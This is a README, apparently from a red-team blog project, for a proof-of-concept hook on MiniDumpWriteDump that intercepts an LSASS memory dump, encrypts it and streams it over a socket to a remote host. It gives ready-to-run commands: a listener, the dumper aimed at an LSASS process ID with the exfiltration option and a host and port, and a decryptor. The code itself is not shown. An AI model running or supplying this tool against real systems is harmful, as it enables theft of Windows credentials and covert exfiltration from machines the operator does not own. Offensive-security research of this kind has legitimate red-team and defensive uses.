MiniDumpWriteDump behavior modification hook

Read the full article in our blog: Adepts Of 0xCC: Hooks On Hoot Off

This is a function hook that allows to access the buffer generated by MiniDumpWriteDump before it gets to disk.

Once accessed, it will encrypt the buffer and send it through a socket to a given host.

A full VS solution is provided. Just compile it.

First, set up the server to listen on the receiving host:

python3 serv.py <PORT>

    python3 serv.py 1234

.\minidumppoc.exe <LSASS_PID> <WRITE_TO_FILE 0|1> <EXFIL 0|1> [<HOST> <PORT>] [<EXPORT_PATH>]

    minidump.exe 696 1 1 '192.168.1.10' 1234 "c:\test.dmp"

Once the whole file is received, close the server, and use the dummy decryptor:

python3 dec.py woot.dmp woot_decrypted.dmp 0xb0